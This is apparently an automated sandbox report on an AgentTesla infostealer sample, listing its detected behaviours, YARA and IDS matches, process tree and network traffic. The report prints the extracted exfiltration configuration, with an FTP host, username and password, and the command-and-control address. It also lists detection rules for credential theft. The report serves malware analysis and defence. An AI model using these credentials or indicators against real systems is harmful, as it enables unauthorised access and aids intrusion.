Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
4287eV6mBc.exe

Overview

General Information

Sample name:4287eV6mBc.exe
renamed because original name is a hash value
Original sample name:06f6eccac99f9be344bfba51fbccb827405551767d00224ef06c2e2f525f95af.exe
Analysis ID:1588971
MD5:edb2e2cea8df699849675ccf5f9b12b4
SHA1:a5eb63f4ad859b4925ca9f6a7511c13201387256
SHA256:06f6eccac99f9be344bfba51fbccb827405551767d00224ef06c2e2f525f95af
Tags:exeFormbookuser-adrian__luca
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AgentTesla
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Check if machine is in data center or colocation facility
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
May check the online IP address of the machine
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses FTP
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • 4287eV6mBc.exe (PID: 7316 cmdline: "C:\Users\user\Desktop\4287eV6mBc.exe" MD5: EDB2E2CEA8DF699849675CCF5F9B12B4)
    • RegSvcs.exe (PID: 7408 cmdline: "C:\Users\user\Desktop\4287eV6mBc.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
{"Exfil Mode": "FTP", "Host": "ftp://ftp.jeepcommerce.rs", "Username": "w133y@jeepcommerce.rs", "Password": "Q6]7rLSD*gU2"}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    SourceRuleDescriptionAuthorStrings
    00000000.00000002.1383949658.0000000000B10000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000000.00000002.1383949658.0000000000B10000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
        00000000.00000002.1383949658.0000000000B10000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          00000000.00000002.1383949658.0000000000B10000.00000004.00001000.00020000.00000000.sdmpINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
          • 0x34703:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
          • 0x34775:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
          • 0x347ff:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
          • 0x34891:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
          • 0x348fb:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
          • 0x3496d:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
          • 0x34a03:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
          • 0x34a93:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
          00000000.00000002.1383949658.0000000000B10000.00000004.00001000.00020000.00000000.sdmpMALWARE_Win_AgentTeslaV2AgenetTesla Type 2 Keylogger payloadditekSHen
          • 0x318f7:$s2: GetPrivateProfileString
          • 0x30fd4:$s3: get_OSFullName
          • 0x32638:$s5: remove_Key
          • 0x3279b:$s5: remove_Key
          • 0x336f3:$s6: FtpWebRequest
          • 0x346e5:$s7: logins
          • 0x34c57:$s7: logins
          • 0x3795c:$s7: logins
          • 0x37a1a:$s7: logins
          • 0x3936d:$s7: logins
          • 0x385b4:$s9: 1.85 (Hash, version 2, native byte-order)
          Click to see the 9 entries
          SourceRuleDescriptionAuthorStrings
          2.2.RegSvcs.exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            2.2.RegSvcs.exe.400000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
              2.2.RegSvcs.exe.400000.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                2.2.RegSvcs.exe.400000.0.unpackINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
                • 0x34703:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                • 0x34775:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
                • 0x347ff:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
                • 0x34891:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                • 0x348fb:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                • 0x3496d:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                • 0x34a03:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                • 0x34a93:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
                2.2.RegSvcs.exe.400000.0.unpackMALWARE_Win_AgentTeslaV2AgenetTesla Type 2 Keylogger payloadditekSHen
                • 0x318f7:$s2: GetPrivateProfileString
                • 0x30fd4:$s3: get_OSFullName
                • 0x32638:$s5: remove_Key
                • 0x3279b:$s5: remove_Key
                • 0x336f3:$s6: FtpWebRequest
                • 0x346e5:$s7: logins
                • 0x34c57:$s7: logins
                • 0x3795c:$s7: logins
                • 0x37a1a:$s7: logins
                • 0x3936d:$s7: logins
                • 0x385b4:$s9: 1.85 (Hash, version 2, native byte-order)
                Click to see the 9 entries
                No Sigma rule has matched
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-11T07:48:29.677166+010020299271A Network Trojan was detected192.168.2.949761195.252.110.25321TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-11T07:48:30.260962+010028555421A Network Trojan was detected192.168.2.949774195.252.110.25360499TCP
                2025-01-11T07:48:30.266178+010028555421A Network Trojan was detected192.168.2.949774195.252.110.25360499TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-11T07:48:30.266178+010018000091A Network Trojan was detected192.168.2.949774195.252.110.25360499TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: http://ftp.jeepcommerce.rsAvira URL Cloud: Label: malware
                Source: 2.2.RegSvcs.exe.400000.0.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "FTP", "Host": "ftp://ftp.jeepcommerce.rs", "Username": "w133y@jeepcommerce.rs", "Password": "Q6]7rLSD*gU2"}
                Source: 4287eV6mBc.exeReversingLabs: Detection: 79%
                Source: 4287eV6mBc.exeVirustotal: Detection: 61%Perma Link
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: 4287eV6mBc.exeJoe Sandbox ML: detected
                Source: 4287eV6mBc.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: Binary string: wntdll.pdbUGP source: 4287eV6mBc.exe, 00000000.00000003.1380738298.0000000003470000.00000004.00001000.00020000.00000000.sdmp, 4287eV6mBc.exe, 00000000.00000003.1382245701.0000000003610000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: 4287eV6mBc.exe, 00000000.00000003.1380738298.0000000003470000.00000004.00001000.00020000.00000000.sdmp, 4287eV6mBc.exe, 00000000.00000003.1382245701.0000000003610000.00000004.00001000.00020000.00000000.sdmp
                Source: C:\Users\user\Desktop\4287eV6mBc.exeCode function: 0_2_0064445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_0064445A
                Source: C:\Users\user\Desktop\4287eV6mBc.exeCode function: 0_2_0064C6D1 FindFirstFileW,FindClose,0_2_0064C6D1
                Source: C:\Users\user\Desktop\4287eV6mBc.exeCode function: 0_2_0064C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0064C75C
                Source: C:\Users\user\Desktop\4287eV6mBc.exeCode function: 0_2_0064EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0064EF95
                Source: C:\Users\user\Desktop\4287eV6mBc.exeCode function: 0_2_0064F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0064F0F2
                Source: C:\Users\user\Desktop\4287eV6mBc.exeCode function: 0_2_0064F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0064F3F3
                Source: C:\Users\user\Desktop\4287eV6mBc.exeCode function: 0_2_006437EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_006437EF
                Source: C:\Users\user\Desktop\4287eV6mBc.exeCode function: 0_2_00643B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00643B12
                Source: C:\Users\user\Desktop\4287eV6mBc.exeCode function: 0_2_0064BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0064BCBC

                Networking

                barindex
                Source: Network trafficSuricata IDS: 2029927 - Severity 1 - ET MALWARE AgentTesla Exfil via FTP : 192.168.2.9:49761 -> 195.252.110.253:21
                Source: Network trafficSuricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.9:49774 -> 195.252.110.253:60499
                Source: Network trafficSuricata IDS: 1800009 - Severity 1 - Joe Security MALWARE AgentTesla - FTP Exfil Passwords : 192.168.2.9:49774 -> 195.252.110.253:60499
                Source: Yara matchFile source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.4287eV6mBc.exe.b10000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.1383949658.0000000000B10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: global trafficTCP traffic: 192.168.2.9:49774 -> 195.252.110.253:60499
                Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
                Source: Joe Sandbox ViewIP Address: 195.252.110.253 195.252.110.253
                Source: unknownDNS query: name: ip-api.com
                Source: unknownFTP traffic detected: 195.252.110.253:21 -> 192.168.2.9:49761 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 50 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 50 allowed.220-Local time is now 07:48. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 50 allowed.220-Local time is now 07:48. Server port: 21.220-This is a private system - No anonymous login 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 50 allowed.220-Local time is now 07:48. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 50 allowed.220-Local time is now 07:48. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: C:\Users\user\Desktop\4287eV6mBc.exeCode function: 0_2_006522EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_006522EE
                Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                Source: global trafficDNS traffic detected: DNS query: ip-api.com
                Source: global trafficDNS traffic detected: DNS query: ftp.jeepcommerce.rs
                Source: RegSvcs.exe, 00000002.00000002.3802883039.0000000002E9E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ftp.jeepcommerce.rs
                Source: RegSvcs.exe, 00000002.00000002.3802883039.0000000002E41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com
                Source: 4287eV6mBc.exe, 00000000.00000002.1383949658.0000000000B10000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3801126508.0000000000402000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3802883039.0000000002E41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hosting
                Source: RegSvcs.exe, 00000002.00000002.3801366079.0000000000E2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hostingl
                Source: RegSvcs.exe, 00000002.00000002.3802883039.0000000002E41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: 4287eV6mBc.exe, 00000000.00000002.1383949658.0000000000B10000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3801126508.0000000000402000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                Source: C:\Users\user\Desktop\4287eV6mBc.exeCode function: 0_2_00654164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00654164
                Source: C:\Users\user\Desktop\4287eV6mBc.exeCode function: 0_2_00654164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00654164
                Source: C:\Users\user\Desktop\4287eV6mBc.exeCode function: 0_2_00653F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00653F66
                Source: C:\Users\user\Desktop\4287eV6mBc.exeCode function: 0_2_0064001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_0064001C
                Source: C:\Users\user\Desktop\4287eV6mBc.exeCode function: 0_2_0066CABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0066CABC

                System Summary

                barindex
                Source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                Source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                Source: 0.2.4287eV6mBc.exe.b10000.1.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                Source: 0.2.4287eV6mBc.exe.b10000.1.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                Source: 0.2.4287eV6mBc.exe.b10000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                Source: 0.2.4287eV6mBc.exe.b10000.1.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                Source: 00000000.00000002.1383949658.0000000000B10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                Source: 00000000.00000002.1383949658.0000000000B10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                Source: C:\Users\user\Desktop\4287eV6mBc.exeCode function: This is a third-party compiled AutoIt script.0_2_005E3B3A
                Source: 4287eV6mBc.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                Source: 4287eV6mBc.exe, 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_686f818d-0
                Source: 4287eV6mBc.exe, 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_4d15573b-6
                Source: 4287eV6mBc.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_716d8593-b
                Source: 4287eV6mBc.exeString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_1c6fc5ef-3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess Stats: CPU usage > 49%
                Source: C:\Users\user\Desktop\4287eV6mBc.exeCode function: 0_2_0064A1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,0_2_0064A1EF
                Source: C:\Users\user\Desktop\4287eV6mBc.exeCode function: 0_2_00638310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00638310
                Source: C:\Users\user\Desktop\4287eV6mBc.exeCode function: 0_2_006451BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_006451BD
                Source: C:\Users\user\Desktop\4287eV6mBc.exeCode function: 0_2_005EE6A00_2_005EE6A0
                Source: C:\Users\user\Desktop\4287eV6mBc.exeCode function: 0_2_0060D9750_2_0060D975
                Source: C:\Users\user\Desktop\4287eV6mBc.exeCode function: 0_2_005EFCE00_2_005EFCE0
                Source: C:\Users\user\Desktop\4287eV6mBc.exeCode function: 0_2_006021C50_2_006021C5
                Source: C:\Users\user\Desktop\4287eV6mBc.exeCode function: 0_2_006162D20_2_006162D2
                Source: C:\Users\user\Desktop\4287eV6mBc.exeCode function: 0_2_006603DA0_2_006603DA
                Source: C:\Users\user\Desktop\4287eV6mBc.exeCode function: 0_2_0061242E0_2_0061242E
                Source: C:\Users\user\Desktop\4287eV6mBc.exeCode function: 0_2_006025FA0_2_006025FA
                Source: C:\Users\user\Desktop\4287eV6mBc.exeCode function: 0_2_0063E6160_2_0063E616
                Source: C:\Users\user\Desktop\4287eV6mBc.exeCode function: 0_2_005F66E10_2_005F66E1
                Source: C:\Users\user\Desktop\4287eV6mBc.exeCode function: 0_2_0061878F0_2_0061878F
                Source: C:\Users\user\Desktop\4287eV6mBc.exeCode function: 0_2_006168440_2_00616844
                Source: C:\Users\user\Desktop\4287eV6mBc.exeCode function: 0_2_006608570_2_00660857
                Source: C:\Users\user\Desktop\4287eV6mBc.exeCode function: 0_2_005F88080_2_005F8808
                Source: C:\Users\user\Desktop\4287eV6mBc.exeCode function: 0_2_006488890_2_00648889
                Source: C:\Users\user\Desktop\4287eV6mBc.exeCode function: 0_2_0060CB210_2_0060CB21
                Source: C:\Users\user\Desktop\4287eV6mBc.exeCode function: 0_2_00616DB60_2_00616DB6
                Source: C:\Users\user\Desktop\4287eV6mBc.exeCode function: 0_2_005F6F9E0_2_005F6F9E
                Source: C:\Users\user\Desktop\4287eV6mBc.exeCode function: 0_2_005F30300_2_005F3030
                Source: C:\Users\user\Desktop\4287eV6mBc.exeCode function: 0_2_0060F1D90_2_0060F1D9
                Source: C:\Users\user\Desktop\4287eV6mBc.exeCode function: 0_2_006031870_2_00603187
                Source: C:\Users\user\Desktop\4287eV6mBc.exeCode function: 0_2_005E12870_2_005E1287
                Source: C:\Users\user\Desktop\4287eV6mBc.exeCode function: 0_2_006014840_2_00601484
                Source: C:\Users\user\Desktop\4287eV6mBc.exeCode function: 0_2_005F55200_2_005F5520
                Source: C:\Users\user\Desktop\4287eV6mBc.exeCode function: 0_2_006076960_2_00607696
                Source: C:\Users\user\Desktop\4287eV6mBc.exeCode function: 0_2_005F57600_2_005F5760
                Source: C:\Users\user\Desktop\4287eV6mBc.exeCode function: 0_2_006019780_2_00601978
                Source: C:\Users\user\Desktop\4287eV6mBc.exeCode function: 0_2_00619AB50_2_00619AB5
                Source: C:\Users\user\Desktop\4287eV6mBc.exeCode function: 0_2_00667DDB0_2_00667DDB
                Source: C:\Users\user\Desktop\4287eV6mBc.exeCode function: 0_2_0060BDA60_2_0060BDA6
                Source: C:\Users\user\Desktop\4287eV6mBc.exeCode function: 0_2_00601D900_2_00601D90
                Source: C:\Users\user\Desktop\4287eV6mBc.exeCode function: 0_2_005EDF000_2_005EDF00
                Source: C:\Users\user\Desktop\4287eV6mBc.exeCode function: 0_2_005F3FE00_2_005F3FE0
                Source: C:\Users\user\Desktop\4287eV6mBc.exeCode function: 0_2_00E9CA000_2_00E9CA00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_02BF4A882_2_02BF4A88
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_02BF3E702_2_02BF3E70
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_02BFEC982_2_02BFEC98
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_02BFADA82_2_02BFADA8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_02BF41B82_2_02BF41B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_063FC3802_2_063FC380
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_063FAAE82_2_063FAAE8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_064766E02_2_064766E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_064752682_2_06475268
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0647C2902_2_0647C290
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0647B3282_2_0647B328
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_06477E682_2_06477E68
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_06472BB82_2_06472BB8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_064777882_2_06477788
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0647E4B82_2_0647E4B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_064700402_2_06470040
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_064759D82_2_064759D8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_064700062_2_06470006
                Source: C:\Users\user\Desktop\4287eV6mBc.exeCode function: String function: 00608900 appears 42 times
                Source: C:\Users\user\Desktop\4287eV6mBc.exeCode function: String function: 005E7DE1 appears 36 times
                Source: C:\Users\user\Desktop\4287eV6mBc.exeCode function: String function: 00600AE3 appears 70 times
                Source: 4287eV6mBc.exe, 00000000.00000003.1381324486.000000000373D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 4287eV6mBc.exe
                Source: 4287eV6mBc.exe, 00000000.00000002.1383949658.0000000000B10000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename90cf818a-462d-43ad-9b06-442ae93cc408.exe4 vs 4287eV6mBc.exe
                Source: 4287eV6mBc.exe, 00000000.00000003.1381177576.0000000003593000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 4287eV6mBc.exe
                Source: 4287eV6mBc.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                Source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
